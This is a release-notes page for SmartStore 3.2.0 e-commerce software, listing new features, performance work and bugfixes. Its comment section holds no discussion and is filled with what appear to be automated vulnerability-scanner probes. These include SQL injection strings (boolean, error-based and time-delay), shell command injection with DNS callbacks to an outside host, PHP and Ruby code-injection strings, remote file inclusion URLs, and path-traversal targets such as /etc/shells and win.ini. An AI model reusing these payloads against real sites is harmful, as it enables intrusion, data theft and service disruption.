Saturday, May 11, 2019
SmartStore version 3.2.0
Highlights
- (NEW) Page Builder: Create fascinating content that will boost your sales. No coding is required thanks to a powerful WYSIWYG editor which utilizes the revolutionary CSS Grid system (commercial plugin)
- (NEW) Menu Builder: Visual manager for all sorts of menus. Change existing menus or create your own and place them anywhere you want.
- (Perf) Faster MegaSearch thanks to Lucene.NET 4.8
- (Perf) Huge performance increase in discount resolution and calculation.
New Features
- EmailReminder:
- Reminders for open shopping carts
- Reminders for product reviews
- Reminders to visit the shop after a long absence
- Scheduling
- Task execution history
- Web farms: tasks can run decidedly on each machine of a web farm
- #1144 MegaSearch: multi server search index
- Topics & Pages
- Access control lists
- Grid paging & filtering
- New properties: added IsPublished, Short Title (link text) and Intro (teaser) properties.
- #1542: added options to set body CSS class and Html Id.
- MegaSearch:
- Supports searching for forum posts.
- #1172 Option to display related search terms on search page.
- Command to continue a previously aborted search index rebuild.
- Import/export of:
- Product tags
- Tier prices
- Product attribute options
- Product attribute combinations (update only)
- Forum:
- Added option to display a captcha on forum pages when creating or replying to a topic.
- #417 Restrict forum groups to specific customer roles.
- Added published property to forum topic and post.
- Added voting for forum posts.
- Several performance improvements.
- BeezUp:
- #1459 Add option to only submit one category name per product
- Allow to specify export categories per product
- Santander:
- Added payment method for instalment purchase.
- Added financing calculator.
- Updated icon library to Font Awesome 5 Free with the possibility to activate pro version in the frontend.
- New storefront catalog options: ShowSubCategoriesInSubPages, ShowDescriptionInSubPages & IncludeFeaturedProductsInSubPages (Subpage = List index > 1 or any active filter).
- New security option: Use invisible reCAPTCHA
- Wallet: Allow customer to choose whether refund should be submitted to his wallet.
- Added option to display preview pictures in product lists
- Added option to add multiple file versions to product download section
- Added options for alternating price display (in badges)
- Customer avatar: Letter with colored background if no avatar image was uploaded.
- Viveum: Supports payment via "Virtual Account Brands" (e.g. PayPal).
- Added options for alternating price display (in badges).
- #1515 Poll: Add result tab with a list of answers and customers for a poll
- BMEcat: Added export and import of product tags.
- Web-API: Added endpoints for ProductSpecificationAttribute.
- Trusted Shops: Added new Trustbadge display for mobile devices
- (Dev) Added sm:EfCommandTimeout setting to web.config (was 30 sec. fixed, now configurable)
Improvements
- (Perf) Significantly increased query performance for products with a lot of category assignments (> 10).
- (Perf) Increased app startup speed by up to 20%.
- (Perf) Ultra-fast file-based XML sitemap generation for extremely large catalogs (> 1M)
- At least 10x faster
- Generated files are saved on the hard disk now: a rebuild after an app restart is no longer necessary.
- No exclusive locks during rebuilds anymore: if an (outdated) file already exists, it is returned instantly.
- (Dev) Enhanced pub/sub: new
IConsumer
marker interface for classes that contain one or more event message handlers. The genericIConsumer<T>
implementsIConsumer
but has been marked asObsolete
. - Better protection against XSS attacks
- Updated to Bootstrap version 4.1.3
- Debitoor:
- #1479 Show in messages the delivery time at the time of purchase
- #1184 Sort current shopping carts & current wishlists by
ShoppingCartItem.CreatedOn
. - #1106 BMECat: import & export support for product keywords
- #1499 Added hint to forms indicating that fields with an asterisk (*) are required
- Added filter for newsletter subscriber export by working language
- Refactored download section
- Enhanced EntityPicker to pick from customers, manufacturers & categories
- #1510 Breadcrumb of an associated product should include the grouped product if it has no assigned categories.
- OpenTrans: added customer number to parties
- Do not filter cookie using resources if cookie usage has not yet been consented to.
- #1563 QueuedMessagesClearTask: add a setting for the age of the mails to be deleted.
- #1569 Added a setting to show login note if no prices are displayed due to customer group permissions.
- PayPal PLUS: Up to 10 more third party payment methods are allowed by PayPal now.
- #1560 Tell-a-Friend and anonymous user: render alert box and tell guest to login to use this function
- #1571 Compare products now shows all specification attribute options
- #1539 Signing in is now allowed with e-mail and username
- Trusted Shops: Trustbadge won't be displayed in Popups & Iframes anymore
- #1461 Admin Grid: filter dialog will be displayed entirely even when grid has no data to display
- Lots of minor enhancements for both frontend and admin theme
- Many other minor improvements
Bugfixes
- In a multi-store environment, multiple topics with the same system name can now be resolved reliably.
- GMC:
- Export the product images if no attribute images are defined
- Do not export the first image twice for additional images
- Export image URL of full size image (not default size) for additional images
- Custom labels are now being exported
- Media middleware: 0-byte files should be treated as missing.
- Megamenu alpha/omega blends do now toggle correctly on touch devices
- Summernote HTML editor exceeds parent container width when CodeMirror is activated
- Only display a zero search hits warning if at least one filter is activated
- #1436 Do not display delivery time in customer order completed messages
- "ArgumentNullException: The value must not be NULL" if a topic is password protected
- Tax by region: Fixes after inserting a tax rate country column shows "Unavailable"
- #1014 Switching to default language keeps specific URL alias of current page
- Shipping by total: When inserting a record the country now will be saved
- #1460 Editing of the customer title was missing on customer and address pages in the backend
- #1447 Checkout button payment methods (Amazon, PayPal Express) won't work in conjunction with mandatory checkout attributes
- Fixed Autofac circularity error
- When creating a topic, the widget zone input has shown System.String[]
- Switching the language always redirected to the home page if SEO friendly URLs was deactivated.
- File upload of a checkout attribute was not stored on cart page.
- Redirecting within checkout may have displayed an incorrect URL in the browser.
- Server cannot modify cookies after HTTP headers have been sent.
- Wrong base price on product and cart page when a special price is active.
- In a multi-store, message templates may have loaded the wrong disclaimer and conditions-of-use text.
- NullReferenceException in manufacturer list when there is no manufacturer.
- Wrong order of featured products on category page.
- #1504 Cart item price calculation was wrong if attribute combinations with text types were involved.
- #1485 Dropdown list for product sorting didn't not work with Internet Explorer 11.
- #1468 Twitter authentication wasn't working anymore.
- Newsletter subscription didn't work when customer privacy setting DisplayGdprConsentOnForms was turned off
- Fixed social media image detection
- Fixed redirection of bots when several languages were active
- Region cannot be selected in checkout when entering a billing or shipping address
- Fixed invalid conversion of "System.Int32" to "SmartStore.Core.Domain.Tax.VatNumberStatus" when placing an order
- MegaMenu: Improved item rendering for third tier elements
- Product display order on category and manufacturer pages was sometimes wrong when using linq search.
- Debitoor: Wrong invoice total if a subtotal discount has been applied.
- Import: Fixes invalid conversion "System.Double" to "SmartStore.Core.Domain.Catalog.QuantityControlType".
- Topics: Fixes "Cannot insert duplicate key row in object 'dbo.UrlRecord' with unique index 'IX_UrlRecord_Slug'".
- #1566 Santander: eliminate the 1 cent rounding difference at amountTotalNet.
- Fixed redirection to the homepage for pages which are loaded while the application is restarted.
- #1570 Filter option "Only deactivated customers" filters deleted instead of deactivated customers.
- #1475 select boxes must be wrapped on mobile devices if data-select-url is set
- Fixed the redirection to the homepage for pages which were loaded while the application was restarted
- Fixes product feeds expect a different base price formatting.
- #1369 Shopping cart shows "Discount code applied", although it is not applied due to a lower tier price.
- Many other fixes...
Comments (144)
3
3
3
3
3
hTTp://r87.com/n
3
1 OR 1=1
3
http://r87.com/n? .php
3
1 OR 1=1
3
'
3
http://r87.com/n?.php
3
NS
NO
3
php://filter//resource=http://r87.com/n? .php
3
r87.com/n
3
AND 'NS='ss
3
ns:netsparker056650=vuln
3
' OR 1=1 OR 'ns'='ns
3
http://example.com/?
ns: netsparker056650=vuln
3
1 OR 17-7=10
3
OR X='ss
3
' OR 1=1 OR '1'='1
3
' OR 1=1 OR '1'='1
3
ns:netsparker056650=vuln
3
1 OR 1=1
3
1 OR 1=1
3
ns:netsparker056650=vuln
3
'
3
NS
NO
3
AND 'NS='ss
3
' OR 1=1 OR 'ns'='ns
3
1 OR 17-7=10
3
OR X='ss
3
' OR 1=1 OR '1'='1
3
' OR 1=1 OR '1'='1
3
%27
3
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
3
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
3
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
3
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
3
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
3
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
3
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
3
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
3
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
3
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
3
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
3
NSFTW
3
'+NSFTW+'
3
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
3
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
3
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
3
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
3
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
3
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
3
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
3
' WAITFOR DELAY '0:0:25'--
3
1 WAITFOR DELAY '0:0:25'--
3
WAITFOR DELAY '0:0:25'--
3
1) WAITFOR DELAY '0:0:25'--
3
') WAITFOR DELAY '0:0:25'--
3
')) WAITFOR DELAY '0:0:25'--
3
1)) WAITFOR DELAY '0:0:25'--
3
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
3
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
3
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
3
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
3
+ ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/
3
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
3
((select sleep(25)))a-- 1
3
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
3
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
3
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
3
';SELECT pg_sleep(25)--
3
;SELECT pg_sleep(25)--
3
SELECT pg_sleep(25)--
3
);SELECT pg_sleep(25)--
3
');SELECT pg_sleep(25)--
3
'));SELECT pg_sleep(25)--
3
));SELECT pg_sleep(25)--
3
((SELECT 1 FROM (SELECT SLEEP(25))A))
3
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
3
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
3
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
3
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
3
3
3
3
Mr.
response.write(9402645*9388726)
Mr.
'+response.write(9402645*9388726)+'
Mr.
"+response.write(9402645*9388726)+"
Mr.
echo mmabkw$()\ jrqbqt\nz^xyu||a #' &echo mmabkw$()\ jrqbqt\nz^xyu||a #|" &echo mmabkw$()\ jrqbqt\nz^xyu||a #
Mr.
&echo ewjljj$()\ pwbpew\nz^xyu||a #' &echo ewjljj$()\ pwbpew\nz^xyu||a #|" &echo ewjljj$()\ pwbpew\nz^xyu||a #
Mr.
|echo hrjyvw$()\ cjgope\nz^xyu||a #' |echo hrjyvw$()\ cjgope\nz^xyu||a #|" |echo hrjyvw$()\ cjgope\nz^xyu||a #
Mr.
(nslookup hitwmkfskshtn4d5a1.bxss.me||perl -e "gethostbyname('hitwmkfskshtn4d5a1.bxss.me')")
Mr.
$(nslookup hitoftpvqujsacebbe.bxss.me||perl -e "gethostbyname('hitoftpvqujsacebbe.bxss.me')")
Mr.
&(nslookup hitsedhqaxvbd5b7a1.bxss.me||perl -e "gethostbyname('hitsedhqaxvbd5b7a1.bxss.me')")&'\"`0&(nslookup hitsedhqaxvbd5b7a1.bxss.me||perl -e "gethostbyname('hitsedhqaxvbd5b7a1.bxss.me')")&`'
Mr.
|(nslookup hithjkgpgruqn8d564.bxss.me||perl -e "gethostbyname('hithjkgpgruqn8d564.bxss.me')")
Mr.
`(nslookup hitbwcgvkihbvbfee7.bxss.me||perl -e "gethostbyname('hitbwcgvkihbvbfee7.bxss.me')")`
Mr.
;(nslookup hitcpekcdylco19163.bxss.me||perl -e "gethostbyname('hitcpekcdylco19163.bxss.me')")|(nslookup hitcpekcdylco19163.bxss.me||perl -e "gethostbyname('hitcpekcdylco19163.bxss.me')")&(nslookup hitcpekcdylco19163.bxss.me||perl -e "gethostbyname('hitcpekcdylco19163.bxss.me')")
Mr.
-1 OR 2+512-512-1=0+0+0+1 --
Mr.
-1 OR 3+512-512-1=0+0+0+1 --
Mr.
-1 OR 2+716-716-1=0+0+0+1
Mr.
-1 OR 3+716-716-1=0+0+0+1
Mr.
-1' OR 2+689-689-1=0+0+0+1 --
Mr.
-1' OR 3+689-689-1=0+0+0+1 --
Mr.
-1' OR 2+423-423-1=0+0+0+1 or 'GUGdB2li'='
Mr.
-1' OR 3+423-423-1=0+0+0+1 or 'GUGdB2li'='
Mr.
-1" OR 2+74-74-1=0+0+0+1 --
Mr.
-1" OR 3+74-74-1=0+0+0+1 --
Mr.
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Mr.
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
Mr.
Http://bxss.me/t/fit.txt
Mr.
http://bxss.me/t/fit.txt?.jpg
Mr.
/etc/shells
Mr.
c:/windows/win.ini
Mr.
bxss.me
Mr.
'.gethostbyname(lc('hityp'.'urynaudaf6ddd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(85).chr(104).chr(74).'
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
".gethostbyname(lc("hitgm"."igxdhvrpbd461.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(89).chr(113).chr(79)."
Mr.
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
Mr.
';print(md5(31337));$a='
Mr.
";print(md5(31337));$a="
Mr.
${@print(md5(31337))}
Mr.
${@print(md5(31337))}\
Mr.
'.print(md5(31337)).'
Mr.
"+"A".concat(70-3).concat(22*4).concat(110).concat(76).concat(99).concat(88)+(require"socket"
Socket.gethostbyname("hitiu"+"kqhjhhuifb9db.bxss.me.")[3].to_s)+"
Mr.
'+'A'.concat(70-3).concat(22*4).concat(122).concat(71).concat(102).concat(72)+(require'socket'
Socket.gethostbyname('hitot'+'eavzynmo3068b.bxss.me.')[3].to_s)+'
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
01ozTyfk'; waitfor delay '0:0:15' --
Mr.
YqEln5FU'); waitfor delay '0:0:15' --
Mr.
NrGu2MBV')); waitfor delay '0:0:15' --
Mr.
-5 OR 764=(SELECT 764 FROM PG_SLEEP(15))--
Mr.
-5) OR 876=(SELECT 876 FROM PG_SLEEP(15))--
Mr.
-1)) OR 949=(SELECT 949 FROM PG_SLEEP(15))--
Mr.
z3ysAWFt' OR 635=(SELECT 635 FROM PG_SLEEP(15))--
Mr.
Oad8rYxm') OR 903=(SELECT 903 FROM PG_SLEEP(15))--
Mr.
FXCJovGJ')) OR 544=(SELECT 544 FROM PG_SLEEP(15))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@94XoP